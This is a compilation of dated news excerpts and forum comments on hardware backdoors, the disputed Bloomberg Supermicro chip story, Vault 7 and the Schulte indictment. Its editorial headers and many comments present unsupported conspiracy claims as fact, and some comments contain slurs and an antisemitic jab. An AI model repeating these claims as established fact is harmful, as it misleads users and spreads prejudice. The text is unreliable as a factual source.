This is a physical-access backdoor. You have to have your hands on the hardware to be able to use JTAG. It's not a "remote kill switch" driven by a magic data trigger, it's a mechanism that requires use of a special connector on the circuit board to connect to a dedicated JTAG port that is simply neither used nor accessible in anything resembling normal operation.

That said, it's still pretty bad, because hardware does occasionally end up in the hands of unfriendlies (e.g., crashed drones). FPGAs like these are often used to run classified software radio algorithms with anti-jam and anti-interception goals, or to run classified cryptographic algorithms. If those algorithms can be extracted from otherwise-dead and disassembled equipment, that would be bad--the manufacturer's claim that the FPGA bitstream can't be extracted might be part of the system's security certification assumptions. If that claim is false, and no other counter-measures are place, that could be pretty bad.

Surreptitiously modifying a system in place through the JTAG port is possible, but less of a threat: the adversary would have to get access to the system and then return it without anyone noticing. Also, a backdoor inserted that way would have to co-exist peacefully with all the other functions of the FPGA, a significant challenge both from an intellectual standpoint and from a size/timing standpoint--the FPGA may just not have enough spare capacity or spare cycles. They tend to be packed pretty full, 'coz they're expensive and you want to use all the capacity you have available to do clever stuff.

Fnord666 ( 889225 ) , Monday May 28, 2012 @09:16PM ( #40138557 ) Journal
Re:Big risk is to "secret sauce" for comms & c ( Score: 4 , Insightful)
This is a physical-access backdoor. You have to have your hands on the hardware to be able to use JTAG. It's not a "remote kill switch" driven by a magic data trigger, it's a mechanism that requires use of a special connector on the circuit board to connect to a dedicated JTAG port that is simply neither used nor accessible in anything resembling normal operation.

Surreptitiously modifying a system in place through the JTAG port is possible, but less of a threat: the adversary would have to get access to the system and then return it without anyone noticing.

As someone else mentioned in another post, physical access can be a bit of a misnomer. Technically all that is required is for a computer to be connected via the JTAG interface in order to exploit this. This might be a diagnostic computer for example. If that diagnostic computer were to be infected with a targeted payload, there is your physical access.

nurb432 ( 527695 ) , Monday May 28, 2012 @02:43PM ( #40136477 ) Homepage Journal
Re:Is it called JTAG? ( Score: 2 )

I agree it most likely wasn't malicious, but its more than careless, its irresponsible, especially when dealing with military contracts.

rtfa-troll ( 1340807 ) , Monday May 28, 2012 @03:22PM ( #40136743 )
Re:No China link yet, probably a US backdoor ( Score: 2 )
There is no China link to the backdoor yet.

The page with a link to the final paper actually does mention China. However, it's an American design from a US company. I suspect we will find the backdoor was in the original plans. It will be interesting to see however.

[Oct 04, 2018] Bloomberg is spreading malicious propaganda trying to blame China for modifying hardware with some additional ships

Kind of Chinagate, but China means her Taivan and the design is US-based. Completely false malicious rumors -- propaganda attack on China. The goal is clearly to discredit Chinese hardware manufactures by spreading technical innuendo. In other words this is a kick below the belt.
Bloomberg jerks are just feeding hacker paranoia.
First of all this is not easy to do, secondly this is a useless exercise, as you need access to TCP/IP stack of the computer to transmit information. Software Trojans is much more productive area for such activities.
Oct 04, 2018 | www.zerohedge.com

Today, Bloomberg BusinessWeek published a story claiming that AWS was aware of modified hardware or malicious chips in SuperMicro motherboards in Elemental Media's hardware at the time Amazon acquired Elemental in 2015, and that Amazon was aware of modified hardware or chips in AWS's China Region.

As we shared with Bloomberg BusinessWeek multiple times over the last couple months, this is untrue. At no time, past or present, have we ever found any issues relating to modified hardware or malicious chips in SuperMicro motherboards in any Elemental or Amazon systems. Nor have we engaged in an investigation with the government.

There are so many inaccuracies in ‎this article as it relates to Amazon that they're hard to count. We will name only a few of them here. First, when Amazon was considering acquiring Elemental, we did a lot of due diligence with our own security team, and also commissioned a single external security company to do a security assessment for us as well. That report did not identify any issues with modified chips or hardware. As is typical with most of these audits, it offered some recommended areas to remediate, and we fixed all critical issues before the acquisition closed. This was the sole external security report commissioned. Bloomberg has admittedly never seen our commissioned security report nor any other (and refused to share any details of any purported other report with us).

The article also claims that after learning of hardware modifications and malicious chips in Elemental servers, we conducted a network-wide audit of SuperMicro motherboards and discovered the malicious chips in a Beijing data center. This claim is similarly untrue. The first and most obvious reason is that we never found modified hardware or malicious chips in Elemental servers. Aside from that, we never found modified hardware or malicious chips in servers in any of our data centers. And, this notion that we sold off the hardware and datacenter in China to our partner Sinnet because we wanted to rid ourselves of SuperMicro servers is absurd. Sinnet had been running these data centers since we ‎launched in China, they owned these data centers from the start, and the hardware we "sold" to them was a transfer-of-assets agreement mandated by new China regulations for non-Chinese cloud providers to continue to operate in China.

Amazon employs stringent security standards across our supply chain – investigating all hardware and software prior to going into production and performing regular security audits internally and with our supply chain partners. We further strengthen our security posture by implementing our own hardware designs for critical components such as processors, servers, storage systems, and networking equipment.

Security will always be our top priority. AWS is trusted by many of the world's most risk-sensitive organizations precisely because we have demonstrated this unwavering commitment to putting their security above all else. We are constantly vigilant about potential threats to our customers, and we take swift and decisive action to address them whenever they are identified.

– Steve Schmidt, Chief Information Security Officer

Trumptards are IDIOTs


CashMcCall , 5 hours ago

TRUMPTARDS have an enormous amount of surplus time on their hands to forward their Harry Potter Styled Conspiracies.

APPLE AND AMAZON DENIED THE STORY. STORY OVER... GET IT CREEPY?

CashMcCall , 5 hours ago

While TRUMPTARDS were posting their Conspiracy Theories and the "TrumpEXPERTS" were embellishing the ridiculous story with their lavish accounts of chip bug design, I was enjoying a Bloomberg windfall.

Having confirmed early that the story was False since AMAZON and APPLE BOTH DENIED IT... and their stock was not moving, I turned to Supermicro which was plunging and down over 50%. I checked the options, and noted they were soft, so I put in bids for long shares and filled blocks at 9 from two accounts.

The moronic TRUMPTARD Conspiracy posts continued, Supermicro is now up over 13.

That is the difference between having a brain in your head or having TRUMPTARD **** FOR BRAINS...

Urban Roman , 5 hours ago

On second thought, this story is just ********. Note that the BBG story never mentions the backdoors that were talked about for over a decade, nor did they mention Mr. Snowden's revelation that those backdoors do exist, and are being used, by the surveillance state.

Since the Chinese factories are manufacturing these things, they'd have all the specs and the blobs and whatever else they need, and would never require a super-secret hardware chip like this. Maybe this MITM chip exists, and maybe it doesn't. But there's nothing to keep China from using the ME on any recent Intel chip, or the equivalent on any recent AMD chip, anywhere.

The purpose of this article is to scare you away from using Huawei or ZTE for anything, and my guess is that it is because those companies did not include these now-standard backdoors in their equipment. Maybe they included Chinese backdoors instead, but again, they wouldn't need a tiny piece of hardware for this MITM attack, since modern processors are all defective by design.

Chairman , 5 hours ago

I think I will start implementing this as an interview question. If a job candidate is stupid enough to believe this **** then they will not work for me.

DisorderlyConduct , 4 hours ago

Well, hmmm, could be. To update a PCB is actually really poor work. I would freak my biscuits if I received one of my PCBs with strange pads, traces or parts.

To substitute a part is craftier. To change the content of a part is harder, and nigh impossible to detect without xray.

Even craftier is to change VHDL code in an OTP chip or an ASIC. The package and internal structure is the same but the fuses would be burned different. No one would likely detect this unless they were specifically looking for it.

Kendle C , 5 hours ago

Well written propaganda fails to prove claims. Everybody in networking and IT knows that switches and routers have access to root, built in, often required by government, backdoors. Scripts are no big thing often used to speed up updates, backups, and troubleshooting. So when western manufacturers began shoveling their work to Taiwan and China, with them they sent millions of text files, including instructions for backdoor access, the means and technology (to do what this **** article is claiming) to modify the design, even classes with default password and bypass operations for future techs. We were shoveling hand over foot designs as fast as we could...all for the almighty dollar while stiffing American workers. So you might say greed trumped security and that fault lies with us. So stuff this cobbled together propaganda piece, warmongering ****.

AllBentOutOfShape , 5 hours ago

ZH has definitely been co-oped. This is just the latest propaganda ******** article of the week they've come out with. I'm seeing more and more articles sourced from well known propaganda outlets in recent months.

skunzie , 6 hours ago

Reminds me of how the US pulled off covert espionage of the Russians in the 70's using Xerox copiers. The CIA inserted trained Xerox copy repairmen to handle repairs on balky copiers in Russian embassies, etc. When a machine was down the technician inserted altered motherboards which would transmit future copies directly to the CIA. This is a cautionary tale for companies to cover their achilles heel (weakest point) as that is generally the easiest way to infiltrate the unsuspecting company.

PrivetHedge , 6 hours ago

What another huge load of bollocks from our pharisee master morons.

I guess they think we're as stupid as they are.

CashMcCall , 6 hours ago

But but but the story came from one of the chosen money changers Bloomberg... everyone knows a *** would never lie or print a false story at the market open

smacker , 7 hours ago

With all the existing ***** chips and backdoors on our computers and smartphones planted by the CIA, NSA, M$, Goolag & friends, and now this chip supposedly from China, it won't be long before there's no space left in RAM and on mobos for the chips that actually make the device do what we bought it to do.

Stinkbug 1 , 7 hours ago

this was going on 20 years ago when it was discovered that digital picture frames from china were collecting passwords and sending them back. it was just a test, so didn't get much press.

now they have the kinks worked out, and are ready for the coup de grace.

I Write Code , 7 hours ago

https://www.reddit.com/r/news/comments/9lac9k/china_used_a_tiny_chip_in_a_hack_that_infiltrated/?st=JMUNFMRR&sh=10c388fb

ChecksandBalances , 7 hours ago

This story seemed to die. Did anyone find anything indicating someone on our side has actually got a look at the malicious chip, assuming it exists? Technical blogs have nothing, only news rags like NewsMaxx. If 30 companies had these chips surely someone has one. This might be one huge fake news story. Why Bloomberg would publish it is kind of odd.

FedPool , 7 hours ago

Probably a limited evaluation operation to gauge the population's appetite for war. Pentagram market research. They're probably hitting all of the comment sections around the web as we speak. Don't forget to wave 'hi'.

Heya warmongers. No, we don't want a war yet, k thanks.

underlying , 7 hours ago

Since were on the topic let's take a look at the scope hacking tools known to the general public known prior to the Supermicro Server Motherboard Hardware Exploit; (P.S. What the **** do you expect when you have Chinese state owned enterprises, at minimum quasi state owned enterprises in special economic development zones controlled by the Chinese communist party, building motherboards?)

Snowden NSA Leaks published in the gaurdian/intercept

https://www.theguardian.com/us-news/the-nsa-files

Wikileaks Vault 7 etc....

https://wikileaks.org/vault7/

Spector/Meltdown vulnerability exploits

https://leeneubecker.com/grc-releases-test-tool-spectre-and-meltdown-vulnerabilities/

Random list compiled by TC bitches

https://techcrunch.com/2017/03/09/names-and-definitions-of-leaked-cia-hacking-tools/

This does not include the private/corporate sector hacking pen testing resources and suites which are abundant and easily available to **** up the competition in their own right.

i.e., https://gbhackers.com/hacking-tools-list/

Urban Roman , 5 hours ago

Exactly. Why would they ever need a super-micro-man-in-the-middle-chip?

Maybe this 'chip' serves some niche in their spycraft, but the article in the keypost ignores a herd of elephants swept under the carpet, and concentrates on a literal speck of dust.

Moribundus , 8 hours ago

A US-funded biomedical laboratory in Georgia may have conducted bioweapons research under the guise of a drug test, which claimed the lives of at least 73 subjects...new documents "allow us to take a fresh look" at outbreaks of African swine fever in southern Russia in 2007-2018, which "spread from the territory of Georgia into the Russian Federation, European nations and China. The infection strain in the samples collected from animals killed by the disease in those nations was identical to the Georgia-2007 strain." https://www.rt.com/news/440309-us-georgia-toxic-bioweapon-test/

Dr. Acula , 8 hours ago

"In a Senate testimony this past February, six major US intelligence heads warned that American citizens shouldn't use Huawei and ZTE products and services." - https://www.theverge.com/2018/5/2/17310870/pentagon-ban-huawei-zte-phones-retail-stores-military-bases

Are these the same intelligence agencies that complain about Russian collusion and cover up 9/11 and pizzagate?

[Sep 05, 2018] West Virginia Offers Free Cybersecurity Training To the Elderly

Sep 04, 2018 | news.slashdot.org
msmash on Tuesday September 04, 2018 @10:50AM from the how-about-that dept

West Virginia's Attorney General Patrick Morrisey, who's currently running for U.S. Senate, announced Tuesday that he's partnering with two local community and technical colleges to connect senior citizens with college students for free cybersecurity training .

The announcement comes amid rising cyber scams, many of which are targeted at elderly.

[Sep 03, 2018] The US Department of Homeland Security fabricated "intelligence reports" of Russian election hacking

Russiagate can be viewed as a pretty inventive way to justify their own existence for bloated Intelligence services: first CIA hacks something leaving traces of russians or Chinese; then the FBI, CIAand Department of Homeland security all enjoy additional money and people to counter the threat.
The scheme is almost untraceable
Sep 03, 2018 | www.moonofalabama.org
BM , Sep 3, 2018 12:54:15 PM | link

The US Department of Homeland Security fabricated "intelligence reports" of Russian election hacking in order to try to get control of the election infrastructure (probebly so that they can hack it more easily to control the election results).

How the Department of Homeland Security Created a Deceptive Tale of Russia Hacking US Voter Sites

[Aug 22, 2018] Microsoft has reason to get in the good graces of the CIA, NSA and Pentagon at this time: Quid pro quo

Notable quotes:
"... In the running are Amazon Web Services, IBM and Microsoft. Winning this contract gives the winner an advantage in winning future related contracts ..."
Aug 22, 2018 | www.moonofalabama.org

librul | Aug 21, 2018 11:04:43 PM | 48

Can we see Microsoft's actions today as a salespitch?

https://www.nextgov.com/it-modernization/2018/07/pentagon-accepting-bids-its-controversial-10-billion-war-cloud/150059/

The Defense Department on Thursday officially began accepting proposals for its highly-anticipated Joint Enterprise Defense Infrastructure cloud contract. The JEDI contract will be awarded to a single cloud provider -- an issue many tech companies rallied against -- and will be valued at up to $10 billion over 10 years, according to the final request for proposal. The contract itself will put a commercial company in charge of hosting and distributing mission-critical workloads and classified military secrets to warfighters around the globe in a single war cloud.

https://www.defenseone.com/technology/2018/08/someone-waging-secret-war-undermine-pentagons-huge-cloud-contract/150685/

As some of the biggest U.S. technology companies have lined up to bid on the $10 billion contract to create a massive Pentagon cloud computing network, the behind-the-scenes war to win it has turned ugly.

In the running are Amazon Web Services, IBM and Microsoft. Winning this contract gives the winner an advantage in winning future related contracts.

[Aug 02, 2018] There was a big row over Kaspersky s software actually doing its job and detecting malware on an NSA officer s personal workstation at home, where he was conducting development in an unauthorized manner.

Notable quotes:
"... There was a big row over Kaspersky's software actually doing its job and detecting malware on an NSA officer's personal workstation at home, where he was conducting development in an unauthorized manner. The software did as it is designed, which is upload the suspicious software to Kaspersky's servers for analysis. This was represented by the US government as some sort of "spying for the Russian intelligence community" by Kaspersky. The US government also made a big deal over the fact that Kaspersky does work with the Russian government on computer security issues, as one would expect of such a company. ..."
Aug 02, 2018 | turcopolier.typepad.com

richardstevenhack -> Bill Herschel , a day ago

Yes, PostgreSQL is very good. It's open source, meaning the source code is available for inspection, so if there was anything suspicious about it, it would likely have been caught before now. Of course, bugs and security issues might well remain, regardless.

Russians make a lot of good software. Their computer training in universities has always been first rate.

This is similar to the big issue over the Kaspersky company, a major manufacturer of a high-quality antimalware suite, being Russian. The US has made it a big issue, passing regulations that prohibit US government offices from using it, forcing Kaspersky to consider moving to Switzerland. I don't think many people in the infosec community have any concerns about Kaspersky being Russian. They've been in the antimalware business for quite a while and always get top marks in the independent antimalware tests.

There was a big row over Kaspersky's software actually doing its job and detecting malware on an NSA officer's personal workstation at home, where he was conducting development in an unauthorized manner. The software did as it is designed, which is upload the suspicious software to Kaspersky's servers for analysis. This was represented by the US government as some sort of "spying for the Russian intelligence community" by Kaspersky. The US government also made a big deal over the fact that Kaspersky does work with the Russian government on computer security issues, as one would expect of such a company.

The whole thing is just another example of "Russian Derangement Syndrome."

[Aug 01, 2018] There was a big row over Kaspersky's software actually doing its job and detecting malware on an NSA officer's personal workstation at home, where he was conducting development in an unauthorized manner.

Aug 01, 2018 | turcopolier.typepad.com

[Jul 05, 2018] Stuxnet opened a can of worms

Jul 05, 2018 | www.theamericanconservative.com

...Stuxnet, which was thought to be a joint American-Israeli assault on Iran's nuclear program. And there are reports of U.S. attempts to similarly hamper North Korean missile development. Some consider such direct attacks on other governments to be akin to acts of war. Would Washington join Moscow in a pledge to become a good cyber citizen?

[Jun 28, 2018] Did Senator Warner and Comey 'Collude' on Russia-gate by Ray McGovern

Notable quotes:
"... The U.S. was in talks for a deal with Julian Assange but then FBI Director James Comey ordered an end to negotiations after Assange offered to prove Russia was not involved in the DNC leak, as Ray McGovern explains. ..."
"... Special to Consortium News ..."
"... The report does not say what led Comey to intervene to ruin the talks with Assange. But it came after Assange had offered to "provide technical evidence and discussion regarding who did not engage in the DNC releases," Solomon quotes WikiLeaks' intermediary with the government as saying. It would be a safe assumption that Assange was offering to prove that Russia was not WikiLeaks' source of the DNC emails. ..."
"... If that was the reason Comey and Warner ruined the talks, as is likely, it would reveal a cynical decision to put U.S. intelligence agents and highly sophisticated cybertools at risk, rather than allow Assange to at least attempt to prove that Russia was not behind the DNC leak. ..."
"... On March 31, 2017, though, WikiLeaks released the most damaging disclosure up to that point from what it called "Vault 7" -- a treasure trove of CIA cybertools leaked from CIA files. This disclosure featured the tool "Marble Framework," which enabled the CIA to hack into computers, disguise who hacked in, and falsely attribute the hack to someone else by leaving so-called tell-tale signs -- like Cyrillic, for example. The CIA documents also showed that the "Marble" tool had been employed in 2016. ..."
"... In fact, VIPS and independent forensic investigators, have performed what former FBI Director Comey -- at first inexplicably, now not so inexplicably -- failed to do when the so-called "Russian hack" of the DNC was first reported. In July 2017 VIPS published its key findings with supporting data. ..."
"... Why did then FBI Director Comey fail to insist on getting direct access to the DNC computers in order to follow best-practice forensics to discover who intruded into the DNC computers? (Recall, at the time Sen. John McCain and others were calling the "Russian hack" no less than an "act of war.") A 7th grader can now figure that out. ..."
Jun 27, 2018 | consortiumnews.com

Did Sen. Warner and Comey 'Collude' on Russia-gate? June 27, 2018 • 68 Comments

The U.S. was in talks for a deal with Julian Assange but then FBI Director James Comey ordered an end to negotiations after Assange offered to prove Russia was not involved in the DNC leak, as Ray McGovern explains.

By Ray McGovern
Special to Consortium News

An explosive report by investigative journalist John Solomon on the opinion page of Monday's edition of The Hill sheds a bright light on how Sen. Mark Warner (D-VA) and then-FBI Director James Comey collaborated to prevent WikiLeaks editor Julian Assange from discussing "technical evidence ruling out certain parties [read Russia]" in the controversial leak of Democratic Party emails to WikiLeaks during the 2016 election.

A deal that was being discussed last year between Assange and U.S. government officials would have given Assange "limited immunity" to allow him to leave the Ecuadorian Embassy in London, where he has been exiled for six years. In exchange, Assange would agree to limit through redactions "some classified CIA information he might release in the future," according to Solomon, who cited "interviews and a trove of internal DOJ documents turned over to Senate investigators." Solomon even provided a copy of the draft immunity deal with Assange.

But Comey's intervention to stop the negotiations with Assange ultimately ruined the deal, Solomon says, quoting "multiple sources." With the prospective agreement thrown into serious doubt, Assange "unleashed a series of leaks that U.S. officials say damaged their cyber warfare capabilities for a long time to come." These were the Vault 7 releases, which led then CIA Director Mike Pompeo to call WikiLeaks "a hostile intelligence service."

Solomon's report provides reasons why Official Washington has now put so much pressure on Ecuador to keep Assange incommunicado in its embassy in London.

Assange: Came close to a deal with the U.S. (Photo credit: New Media Days / Peter Erichsen)

The report does not say what led Comey to intervene to ruin the talks with Assange. But it came after Assange had offered to "provide technical evidence and discussion regarding who did not engage in the DNC releases," Solomon quotes WikiLeaks' intermediary with the government as saying. It would be a safe assumption that Assange was offering to prove that Russia was not WikiLeaks' source of the DNC emails.

If that was the reason Comey and Warner ruined the talks, as is likely, it would reveal a cynical decision to put U.S. intelligence agents and highly sophisticated cybertools at risk, rather than allow Assange to at least attempt to prove that Russia was not behind the DNC leak.

The greater risk to Warner and Comey apparently would have been if Assange provided evidence that Russia played no role in the 2016 leaks of DNC documents.

Missteps and Stand Down

In mid-February 2017, in a remarkable display of naiveté, Adam Waldman, Assange's pro bono attorney who acted as the intermediary in the talks, asked Warner if the Senate Intelligence Committee staff would like any contact with Assange to ask about Russia or other issues. Waldman was apparently oblivious to Sen. Warner's stoking of Russia-gate.

Warner contacted Comey and, invoking his name, instructed Waldman to "stand down and end the discussions with Assange," Waldman told Solomon. The "stand down" instruction "did happen," according to another of Solomon's sources with good access to Warner. However, Waldman's counterpart attorney David Laufman , an accomplished federal prosecutor picked by the Justice Departent to work the government side of the CIA-Assange fledgling deal, told Waldman, "That's B.S. You're not standing down, and neither am I."

But the damage had been done. When word of the original stand-down order reached WikiLeaks, trust evaporated, putting an end to two months of what Waldman called "constructive, principled discussions that included the Department of Justice."

The two sides had come within inches of sealing the deal. Writing to Laufman on March 28, 2017, Waldman gave him Assange's offer to discuss "risk mitigation approaches relating to CIA documents in WikiLeaks' possession or control, such as the redaction of Agency personnel in hostile jurisdictions," in return for "an acceptable immunity and safe passage agreement."

On March 31, 2017, though, WikiLeaks released the most damaging disclosure up to that point from what it called "Vault 7" -- a treasure trove of CIA cybertools leaked from CIA files. This disclosure featured the tool "Marble Framework," which enabled the CIA to hack into computers, disguise who hacked in, and falsely attribute the hack to someone else by leaving so-called tell-tale signs -- like Cyrillic, for example. The CIA documents also showed that the "Marble" tool had been employed in 2016.

Misfeasance or Malfeasance

Comey: Ordered an end to talks with Assange.

Veteran Intelligence Professionals for Sanity, which includes among our members two former Technical Directors of the National Security Agency, has repeatedly called attention to its conclusion that the DNC emails were leaked -- not "hacked" by Russia or anyone else (and, later, our suspicion that someone may have been playing Marbles, so to speak).

In fact, VIPS and independent forensic investigators, have performed what former FBI Director Comey -- at first inexplicably, now not so inexplicably -- failed to do when the so-called "Russian hack" of the DNC was first reported. In July 2017 VIPS published its key findings with supporting data.

Two month later , VIPS published the results of follow-up experiments conducted to test the conclusions reached in July.

Why did then FBI Director Comey fail to insist on getting direct access to the DNC computers in order to follow best-practice forensics to discover who intruded into the DNC computers? (Recall, at the time Sen. John McCain and others were calling the "Russian hack" no less than an "act of war.") A 7th grader can now figure that out.

Asked on January 10, 2017 by Senate Intelligence Committee chair Richard Burr (R-NC) whether direct access to the servers and devices would have helped the FBI in their investigation, Comey replied : "Our forensics folks would always prefer to get access to the original device or server that's involved, so it's the best evidence."

At that point, Burr and Warner let Comey down easy. Hence, it should come as no surprise that, according to one of John Solomon's sources, Sen. Warner (who is co-chairman of the Senate Intelligence Committee) kept Sen. Burr apprised of his intervention into the negotiation with Assange, leading to its collapse.

Ray McGovern works with Tell the Word, a publishing arm of the ecumenical Church of the Saviour in inner-city Washington. He was an Army Infantry/Intelligence officer and then a CIA analyst for a total of 30 years and prepared and briefed, one-on-one, the President's Daily Brief from 1981 to 1985.

If you enjoyed this original article please consider making a donation to Consortium News so we can bring you more stories like this one.

[Jun 19, 2018] DOJ Indicts Vault 7 Leak Suspect; WikiLeaks Release Was Largest Breach In CIA History Zero Hedge

Jun 19, 2018 | www.zerohedge.com

A 29-year-old former CIA computer engineer, Joshua Adam Schulte, was indicted Monday by the Department of Justice on charges of masterminding the largest leak of classified information in the spy agency's history .

Schulte, who created malware for the U.S. Government to break into adversaries computers, has been sitting in jail since his August 24, 2017 arrest on unrelated charges of posessing and transporting child pornography - which was discovered in a search of his New York apartment after Schulte was named as the prime suspect in the cyber-breach one week after WikiLeaks published the "Vault 7" series of classified files. Schulte was arrested and jailed on the child porn charges while the DOJ ostensibly built their case leading to Monday's additional charges.

[I]nstead of charging Mr. Schulte in the breach, referred to as the Vault 7 leak, prosecutors charged him last August with possessing child pornography, saying agents had found 10,000 illicit images on a server he created as a business in 2009 while studying at the University of Texas at Austin.

Court papers quote messages from Mr. Schulte that suggest he was aware of the encrypted images of children being molested by adults on his computer, though he advised one user, "Just don't put anything too illegal on there." - New York Times

Monday's DOJ announcement adds new charges related to stealing classified national defense information from the Central Intelligence Agency in 2016 and transmitting it to WikiLeaks ("Organization-1").

The Vault 7 release - a series of 24 documents which began to publish on March 7, 2017 - reveal that the CIA had a wide variety of tools to use against adversaries, including the ability to "spoof" its malware to appear as though it was created by a foreign intelligence agency , as well as the ability to take control of Samsung Smart TV's and surveil a target using a "Fake Off" mode in which they appear to be powered down while eavesdropping.

The CIA's hand crafted hacking techniques pose a problem for the agency. Each technique it has created forms a "fingerprint" that can be used by forensic investigators to attribute multiple different attacks to the same entity .

...

The CIA's Remote Devices Branch's UMBRAGE group collects and maintains a substantial library of attack techniques 'stolen' from malware produced in other states including the Russian Federation.

With UMBRAGE and related projects the CIA cannot only increase its total number of attack types but also misdirect attribution by leaving behind the "fingerprints" of the groups that the attack techniques were stolen from .

UMBRAGE components cover keyloggers, password collection, webcam capture, data destruction, persistence, privilege escalation, stealth, anti-virus (PSP) avoidance and survey techniques . - WikiLeaks

Schulte previously worked for the NSA before joining the CIA, then "left the intelligence community in 2016 and took a job in the private sector," according to a statement reviewed in May by The Washington Post .

Schulte also claimed that he reported "incompetent management and bureaucracy" at the CIA to that agency's inspector general as well as a congressional oversight committee. That painted him as a disgruntled employee, he said, and when he left the CIA in 2016, suspicion fell upon him as "the only one to have recently departed [the CIA engineering group] on poor terms," Schulte wrote. - WaPo

Part of that investigation, reported WaPo, has been analyzing whether the Tor network - which allows internet users to hide their location (in theory) "was used in transmitting classified information."

In other hearings in Schulte's case, prosecutors have alleged that he used Tor at his New York apartment, but they have provided no evidence that he did so to disclose classified information. Schulte's attorneys have said that Tor is used for all kinds of communications and have maintained that he played no role in the Vault 7 leaks. - WaPo

Schulte says he's innocent: " Due to these unfortunate coincidences the FBI ultimately made the snap judgment that I was guilty of the leaks and targeted me," Schulte said. He launched Facebook and GoFundMe pages to raise money for his defense, which despite a $50 million goal, has yet to r eceive a single donation.

me name=

The Post noted in May, the Vault 7 release was one of the most significant leaks in the CIA's history , "exposing secret cyberweapons and spying techniques that might be used against the United States, according to current and former intelligence officials."

The CIA's toy chest includes:

"The source code shows that Marble has test examples not just in English but also in Chinese, Russian, Korean, Arabic and Farsi. This would permit a forensic attribution double game, for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion, --- but there are other possibilities, such as hiding fake error messages."

me title=

me title=

me title=

"Year Zero" documents show that the CIA breached the Obama administration's commitments. Many of the vulnerabilities used in the CIA's cyber arsenal are pervasive and some may already have been found by rival intelligence agencies or cyber criminals.

In addition to its operations in Langley, Virginia the CIA also uses the U.S. consulate in Frankfurt as a covert base for its hackers covering Europe, the Middle East and Africa.

CIA hackers operating out of the Frankfurt consulate ( "Center for Cyber Intelligence Europe" or CCIE) are given diplomatic ("black") passports and State Department cover.

These techniques permit the CIA to bypass the encryption of WhatsApp, Signal, Telegram, Wiebo, Confide and Cloackman by hacking the "smart" phones that they run on and collecting audio and message traffic before encryption is applied.

CIA hackers developed successful attacks against most well known anti-virus programs. These are documented in AV defeats , Personal Security Products , Detecting and defeating PSPs and PSP/Debugger/RE Avoidance . For example, Comodo was defeated by CIA malware placing itself in the Window's "Recycle Bin" . While Comodo 6.x has a "Gaping Hole of DOOM" .

You can see the entire Vault7 release here .

A DOJ statement involving the Vault7 charges reads:

"Joshua Schulte, a former employee of the CIA, allegedly used his access at the agency to transmit classified material to an outside organization . During the course of this investigation, federal agents also discovered alleged child pornography in Schulte's New York City residence ," said Manhattan U.S. Attorney Geoffrey S. Berman.

On March 7, 2017, Organization-1 released on the Internet classified national defense material belonging to the CIA (the "Classified Information"). In 2016, SCHULTE, who was then employed by the CIA, stole the Classified Information from a computer network at the CIA and later transmitted it to Organization-1. SCHULTE also intentionally caused damage without authorization to a CIA computer system by granting himself unauthorized access to the system, deleting records of his activities, and denying others access to the system . SCHULTE subsequently made material false statements to FBI agents concerning his conduct at the CIA.

Schulte faces 135 years in prison if convicted on all 13 charges:

  1. Illegal Gathering of National Defense Information, 18 U.S.C. §§ 793(b) and 2
  2. Illegal Transmission of Lawfully Possessed National Defense Information, 18 U.S.C. §§ 793(d) and 2
  3. Illegal Transmission of Unlawfully Possessed National Defense Information, 18 U.S.C. §§ 793(e) and 2
  4. Unauthorized Access to a Computer To Obtain Classified Information, 18 U.S.C. §§ 1030(a)(1) and 2
  5. Theft of Government Property, 18 U.S.C. §§ 641 and 2
  6. Unauthorized Access of a Computer to Obtain Information from a Department or Agency of the United States, 18 U.S.C. §§ 1030(a)(2) and 2
  7. Causing Transmission of a Harmful Computer Program, Information, Code, or Command, 18 U.S.C. §§ 1030(a)(5) and 2
  8. Making False Statements, 18 U.S.C. §§ 1001 and 2
  9. Obstruction of Justice, 18 U.S.C. §§ 1503 and 2
  10. Receipt of Child Pornography, 18 U.S.C. §§ 2252A(a)(2)(B), (b)(1), and 2
  11. Possession of Child Pornography, 18 U.S.C. §§ 2252A(a)(5)(B), (b)(2), and 2
  12. Transportation of Child Pornography, 18 U.S.C. § 2252A(a)(1)
  13. Criminal Copyright Infringement, 17 U.S.C. § 506(a)(1)(A) and 18 U.S.C. § 2319(b)(1)

Billy the Poet -> Anarchyteez Mon, 06/18/2018 - 22:50 Permalink

So Schulte was framed for kiddie porn because he released information about how the CIA can frame innocent people for computer crime.

A Sentinel -> Billy the Poet Mon, 06/18/2018 - 22:59 Permalink

That seems very likely.

Seems like everyone has kiddy porn magically appear and get discovered after they piss off the deep state bastards.

And the best part is that it's probably just the deep state operatives' own private pedo collections that they use to frame anyone who they don't like.

A Sentinel -> CrabbyR Mon, 06/18/2018 - 23:46 Permalink

I was thinking about the advancement of the technology necessary for that. They can do perfect fake stills already.

My thought is that you will soon need to film yourself 24/7 (with timestamps, shared with a blockchain-like verifiably) so that you can disprove fake video evidence by having a filmed alibi.

CrabbyR -> A Sentinel Tue, 06/19/2018 - 00:07 Permalink

good point but creepy to think it can get that bad

peopledontwanttruth -> Anarchyteez Mon, 06/18/2018 - 22:50 Permalink

Funny how all these whistleblowers are being held for child pornography until trial.

But we have evidence of government officials and Hollyweird being involved in this perversion and they walk among us

secretargentman -> peopledontwanttruth Mon, 06/18/2018 - 22:51 Permalink

Those kiddy porn charges are extremely suspect, IMO.

chunga -> secretargentman Mon, 06/18/2018 - 23:12 Permalink

It's so utterly predictable.

The funny* thing is I believe gov, particularly upper levels, is chock full of pedophiles.

* It isn't funny, my contempt for the US gov grows practically by the hour.

A Sentinel -> chunga Mon, 06/18/2018 - 23:42 Permalink

I said pretty much the same. I further speculated that it was their own porn that they use for framing operations.

SybilDefense -> A Sentinel Tue, 06/19/2018 - 00:33 Permalink

Ironically, every single ex gov whistle blower (/pedophile) has the exact same kiddie porn data on their secret server (hidden in plane view at the apartment). Joe CIA probably has a zip drive preloaded with titled data sets like "Podesta's Greatest Hits", "Hillary's Honey bunnies" or "Willy go to the zoo". Like the mix tapes you used to make for a new gal you were trying to date. Depending upon the mood of the agent in charge, 10,000 images of Weiner's "Warm Pizza" playlist magically appear on the server in 3-2-1... Gotcha!

